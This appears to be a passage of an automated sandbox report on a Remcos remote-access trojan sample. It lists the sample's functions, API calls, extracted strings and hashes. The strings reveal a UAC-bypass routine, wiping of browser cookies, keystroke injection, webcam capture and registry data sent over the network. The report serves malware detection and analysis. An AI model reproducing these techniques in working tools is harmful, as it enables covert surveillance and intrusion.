Yara matches

Similarity

API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
String ID: .exe$8.v$8SG$http\shell\open\command$program files (x86)\$program files\
API String ID: 3286818993-2057653611
Opcode ID: 72adfb785b3f574a19d60f3d41fc94025ad2806abf0e3203f42f61a897081afc
Instruction ID: 0af867b59be632d30c611c6dccf556baefac66a2e67262e696d3f692bc65d575
Opcode Fuzzy Hash: 72adfb785b3f574a19d60f3d41fc94025ad2806abf0e3203f42f61a897081afc
Instruction Fuzzy Hash: 6721A472A002086BDB14BAB58CD6AFE766D9B85328F14043FF405B72C2EE7C9D494269

Function 0041CD9B Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

AllocConsole.KERNEL32 ref: 0041CDA4
GetConsoleWindow.KERNEL32 ref: 0041CDAA
ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2

Strings

5.1.0 Pro, xrefs: 0041CE0B
Remcos v, xrefs: 0041CDFD
CONOUT$, xrefs: 0041CDD0

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Console$Window$AllocOutputShow
String ID: Remcos v$5.1.0 Pro$CONOUT$
API String ID: 4067487056-1043272453
Opcode ID: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
Instruction ID: 3d4e39fb732e2b6cb40f789e287104da8d9afdf675614735db993d10cd8ea689
Opcode Fuzzy Hash: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
Instruction Fuzzy Hash: CD0188719803087AD610F7F1DC8BF9D776C5B14705F6004277604A70D3E7BD9954466E

Function 00419993 Relevance: 12.1, APIs: 8, Instructions: 102keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C), ref: 004199CC
SendInput.USER32(00000001,?,0000001C), ref: 004199ED
SendInput.USER32(00000001,?,0000001C), ref: 00419A0D
SendInput.USER32(00000001,?,0000001C), ref: 00419A21
SendInput.USER32(00000001,?,0000001C), ref: 00419A37
SendInput.USER32(00000001,?,0000001C), ref: 00419A54
SendInput.USER32(00000001,?,0000001C), ref: 00419A6F
SendInput.USER32(00000001,?,0000001C), ref: 00419A8B

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InputSend
String ID:
API String ID: 3431551938-0
Opcode ID: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
Instruction ID: babcb3f23bbfeda7ed9031f98f3524dfd9ae94bb4b0c65128b251ed995bccade
Opcode Fuzzy Hash: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
Instruction Fuzzy Hash: CE31B471558349AEE310CF51DC41BEBBBDCEF98B54F00080FF6808A181D2A6A9C88B97

Function 00447571 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00447679
__freea.LIBCMT ref: 00447723
__freea.LIBCMT ref: 00447741

Part of subcall function 00435E40: _free.LIBCMT ref: 00435E56

Strings

a/p, xrefs: 00447808
am/pm, xrefs: 004477A4
zD, xrefs: 004479AB

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16_free
String ID: a/p$am/pm$zD
API String ID: 2936374016-2723203690
Opcode ID: f0859f4b60942e64c2417795a0aa154076776a6c217ac3e68ed0847ac231e996
Instruction ID: 9fbfa546a4d6e8c17a1525f8bb1fcc11d6b56032d3bbc67104e2604220ae0e85
Opcode Fuzzy Hash: f0859f4b60942e64c2417795a0aa154076776a6c217ac3e68ed0847ac231e996
Instruction Fuzzy Hash: 6AD1D1B1918206CAFB249F68C845ABBB7B1FF05310F28415BE545AB351D33D9D43CBA9

Function 00413A55 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 179registryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413AEB
RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710), ref: 00413B8B

Strings

xUG, xrefs: 00413C46
[regsplt], xrefs: 00413C17
TG, xrefs: 00413BFD

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Enum$InfoQueryValue
String ID: [regsplt]$xUG$TG
API String ID: 3554306468-1165877943
Opcode ID: b730b8f01de3b61de9bdc309d271c932a797a33a56bfebd36572143352d58066
Instruction ID: b9c9d149d6e4de0395087b00820169330fa190b61d8fc59f93bff107e3475f49
Opcode Fuzzy Hash: b730b8f01de3b61de9bdc309d271c932a797a33a56bfebd36572143352d58066
Instruction Fuzzy Hash: E5511D72900219AADB11EB95DC85EEFB77DAF04305F10007AF505F6191EF786B48CBA9

Function 10009492 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32 ref: 100094D4
__fassign.LIBCMT ref: 1000954F
__fassign.LIBCMT ref: 1000956A
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 10009590
WriteFile.KERNEL32(?,?,00000000,10009C07,00000000), ref: 100095AF
WriteFile.KERNEL32(?,?,00000001,10009C07,00000000), ref: 100095E8

Memory Dump Source

Source File: 00000010.00000002.958379212.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.958369053.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.958379212.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
Instruction ID: 7b1e32e7ca62d622bc6abd4954a79b3a1191cf35157f5551c2bc05612337e78d
Opcode Fuzzy Hash: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
Instruction Fuzzy Hash: D7519271D00249AFEB10CFA4CC95BDEBBF8EF09350F15811AE955E7295D731AA41CB60

Function 0044B3BC Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32 ref: 0044B3FE
__fassign.LIBCMT ref: 0044B479
__fassign.LIBCMT ref: 0044B494
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B4BA
WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BB31,00000000), ref: 0044B4D9
WriteFile.KERNEL32(?,?,00000001,0044BB31,00000000), ref: 0044B512

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
Instruction ID: 24f44d390d373c30b0d8a34eda065edd0bccebe0da4884afe324d1cece3cc5ea
Opcode Fuzzy Hash: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
Instruction Fuzzy Hash: 0751D270900208AFDB10CFA8D885AEEFBF4EF09305F14856BE955E7292D734D941CBA9

Function 00456C1A Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00456D49

Strings

D[E, xrefs: 00456C6D, 00456D5E
D[E, xrefs: 00456D10

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free
String ID: D[E$D[E
API String ID: 269201875-3695742444
Opcode ID: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
Instruction ID: e1ec1e089ae9cf4c30c2343e7c59e1c9a5dba52e91c7d03f0b1416238821c5a9
Opcode Fuzzy Hash: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
Instruction Fuzzy Hash: 7A415B31A001046BEB216BBA8C4566F3BB4EF41336F96061BFC24D7293DA7C880D566D

Function 00413D0D Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 135registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32 ref: 00413D46

Part of subcall function 00413A55: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
Part of subcall function 00413A55: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413AEB

Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36

RegCloseKey.ADVAPI32(00000000), ref: 00413EB4

Strings

NG, xrefs: 00413E23
NG, xrefs: 00413D69
xUG, xrefs: 00413EA6
TG, xrefs: 00413E9A

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseEnumInfoOpenQuerysend
String ID: xUG$NG$NG$TG
API String ID: 3114080316-2811732169
Opcode ID: ead052b03b8867dca709ca834bdc8b5f671d7acad6f51352457588d1c8d24132
Instruction ID: 865164b8d80166fcad8b4517e5ed4c9fbafb7c73de3830c3e78154838722fbed
Opcode Fuzzy Hash: ead052b03b8867dca709ca834bdc8b5f671d7acad6f51352457588d1c8d24132
Instruction Fuzzy Hash: 0B419E316082405BC324F726DC56AEF72959FD1348F40883FF54A671D2EF7C5949866E

Function 10003370 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 1000339B
___except_validate_context_record.LIBVCRUNTIME ref: 100033A3
_ValidateLocalCookies.LIBCMT ref: 10003431
__IsNonwritableInCurrentImage.LIBCMT ref: 1000345C
_ValidateLocalCookies.LIBCMT ref: 100034B1

Strings

csm, xrefs: 10003446

Memory Dump Source

Source File: 00000010.00000002.958379212.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.958369053.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.958379212.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
Instruction ID: 0a936c430148d26a69835db3fa9f683d01d5328c1142e13f0191aacd949c771e
Opcode Fuzzy Hash: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
Instruction Fuzzy Hash: D141D678E042189BEB12CF68C880A9FBBF9EF453A4F10C155E9159F25AD731FA01CB91

Function 0040BEE9 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 87COMMON

Download Yara Rule

APIs

Part of subcall function 004135A6: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
Part of subcall function 004135A6: RegQueryValueExA.KERNEL32 ref: 004135E7
Part of subcall function 004135A6: RegCloseKey.KERNEL32(?), ref: 004135F2

ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BF6B
PathFileExistsA.SHLWAPI(?), ref: 0040BF78

Strings

[IE cookies not found], xrefs: 0040BF40
[IE cookies cleared!], xrefs: 0040BFC5, 0040BFEA
Cookies, xrefs: 0040BEFD
Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders, xrefs: 0040BF02

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
API String ID: 1133728706-4073444585
Opcode ID: 64fa2848a199bd2a40e0896628174b15822387fc8284c7b97a1890df31b02a60
Instruction ID: 11f9a5ab4d81baf10890d677fe2d2a0774849eb970c5828eb217b404dd8a17fe
Opcode Fuzzy Hash: 64fa2848a199bd2a40e0896628174b15822387fc8284c7b97a1890df31b02a60
Instruction Fuzzy Hash: 38215271A4021AA6CB04F7B2CC569EE77699F10704F40017FE506B71D2EF7899498ADE

Function 00456B53 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d17155dc6db7c30058fdf5bf10590413c3ccf5281d5a9a865ac9745ee25c2fc
Instruction ID: 6cb1fb7365923ae9cd4386fa22a0d7cc2d4bdc50975796c61f51bb0de8f74700
Opcode Fuzzy Hash: 0d17155dc6db7c30058fdf5bf10590413c3ccf5281d5a9a865ac9745ee25c2fc
Instruction Fuzzy Hash: B9110272504214BAEB216F728C0496F3AACEF85326B52422BFD11C7252DE38CC41CAA8

Function 1000925D Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 10009221: _free.LIBCMT ref: 1000924A

_free.LIBCMT ref: 100092AB

Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746

_free.LIBCMT ref: 100092B6
_free.LIBCMT ref: 100092C1
_free.LIBCMT ref: 10009315
_free.LIBCMT ref: 10009320
_free.LIBCMT ref: 1000932B
_free.LIBCMT ref: 10009336

Memory Dump Source

Source File: 00000010.00000002.958379212.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.958369053.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.958379212.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
Instruction ID: 62dea9ede071ec04ae7e8d39c2d2a9b8d59ba4565e42afa4a1a73bd13a3591d1
Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
Instruction Fuzzy Hash: 3E118E35548B08FAFA20EBB0EC47FCB7B9DEF04780F400824BA9DB6097DA25B5249751

Function 00450EFA Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00450C41: _free.LIBCMT ref: 00450C6A

_free.LIBCMT ref: 00450F48

Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA

_free.LIBCMT ref: 00450F53
_free.LIBCMT ref: 00450F5E
_free.LIBCMT ref: 00450FB2
_free.LIBCMT ref: 00450FBD
_free.LIBCMT ref: 00450FC8
_free.LIBCMT ref: 00450FD3

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
Instruction ID: d9348172fd0740f80504453a64c2ebf0df3e8af845a5f6206b1ac0666941ab15
Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
Instruction Fuzzy Hash: B411A231540B04AAD625BB72CC47FCB779CAF0230BF44491EBEED66053D6ACB9085745

Function 00411163 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00411170
int.LIBCPMT ref: 00411183

Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC

std::_Facet_Register.LIBCPMT ref: 004111C3
std::_Lockit::~_Lockit.LIBCPMT ref: 004111CC
__CxxThrowException@8.LIBVCRUNTIME ref: 004111EA

Strings

(mG, xrefs: 0041117B

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
String ID: (mG
API String ID: 2536120697-4059303827
Opcode ID: 4358ddd6f05c9e1b133220cf21f5160a6bdd3ecf1c15f3e73f45c2fde7630a6a
Instruction ID: 9d9da6683174d9a5c92fa95d325e3547e0845688fcbb555b93a4fb26f280994d
Opcode Fuzzy Hash: 4358ddd6f05c9e1b133220cf21f5160a6bdd3ecf1c15f3e73f45c2fde7630a6a
Instruction Fuzzy Hash: 1411EB32900518A7CB14BB9AD8058DEBB79DF44354F10456FBE04A72D1DB789D40C7D9

Function 0043A35A Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0043A351,004392BE), ref: 0043A368
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A376
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A38F
SetLastError.KERNEL32(00000000,?,0043A351,004392BE), ref: 0043A3E1

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
Instruction ID: 5d53a0da36a7034647469206452edf011e0dcb0cee8899775f26e7a14c982385
Opcode Fuzzy Hash: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
Instruction Fuzzy Hash: 7F01283214C3519EA61526796C86A6B2648EB0A7B9F30133FF918815F1EF594C90514D

Function 004075B0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000002), ref: 004075D0

Part of subcall function 004074FD: _wcslen.LIBCMT ref: 00407521
Part of subcall function 004074FD: CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582

CoUninitialize.OLE32 ref: 00407629

Strings

[+] ucmCMLuaUtilShellExecMethod, xrefs: 004075B5
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 004075B0, 004075B3, 00407605
[+] ShellExec success, xrefs: 0040760E
[+] before ShellExec, xrefs: 004075F1

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InitializeObjectUninitialize_wcslen
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
API String ID: 3851391207-1839356972
Opcode ID: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
Instruction ID: 681a2da4e9d4b9e6b45db6330fec0c9e961fb52a18ca78f8243115a9baea1a6b
Opcode Fuzzy Hash: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
Instruction Fuzzy Hash: B201D272B087016BE2245B25DC0EF6B7758DB81729F11083FF902A61C2EBA9BC0145AB

Function 0040BAA1 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BADD
GetLastError.KERNEL32 ref: 0040BAE7

Strings

[Chrome Cookies not found], xrefs: 0040BB01
UserProfile, xrefs: 0040BAAD
[Chrome Cookies found, cleared!], xrefs: 0040BB0D
\AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAA8

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: DeleteErrorFileLast
String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
API String ID: 2018770650-304995407
Opcode ID: ad6ae7ff657ff4a30210cd1c10e5c69c8194eac217f6538686f2b1907c56e876
Instruction ID: 6bc0ec4de36c0471385c24d45a27137009bd471b3f80e31671ebbef4da92dce6
Opcode Fuzzy Hash: ad6ae7ff657ff4a30210cd1c10e5c69c8194eac217f6538686f2b1907c56e876
Instruction Fuzzy Hash: 08018F31A402095ACA04BBBACD5B8BE7724E912714F50017BF802726E6FE7D5A059ADE

Function 00407260 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 40COMMON

Download Yara Rule

Strings

SG, xrefs: 004076DA
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 004076C4
8.v, xrefs: 00407697

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: SG$8.v$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
API String ID: 0-3993522144
Opcode ID: a5e5064d23fdb4a5105bb888b891a2001f99cf11455aefb2b8df45e89f9c3324
Instruction ID: 1b954d03a55cc3c1a25a26db856d3c6076ddce7f3b9fad0ad77fefb3a3407f05
Opcode Fuzzy Hash: a5e5064d23fdb4a5105bb888b891a2001f99cf11455aefb2b8df45e89f9c3324
Instruction Fuzzy Hash: 2CF046B0F14A00EBCB0467655D186693A05A740356F404C77F907EA2F2EBBD5C41C61E

Function 0043AADC Relevance: 9.3, APIs: 6, Instructions: 284COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 0043AC69
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AC85
__allrem.LIBCMT ref: 0043AC9C
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACBA
__allrem.LIBCMT ref: 0043ACD1
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACEF

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
Instruction ID: 0cac597ccac2158415e78c81c2c349525783c2449c9f0a8280db41f57d0428da
Opcode Fuzzy Hash: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
Instruction Fuzzy Hash: CC812B72640706ABE7209F29CC41B5BB3A9EF48324F24552FF590D7781EB7CE9108B5A

Function 00404371 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 206sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000,0040D262), ref: 004044C4

Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C

Strings

CloseCamera, xrefs: 0040458E
GetFrame, xrefs: 0040459F
HNG, xrefs: 004045E6
OpenCamera, xrefs: 00404582
FreeFrame, xrefs: 004045B0

Memory Dump Source

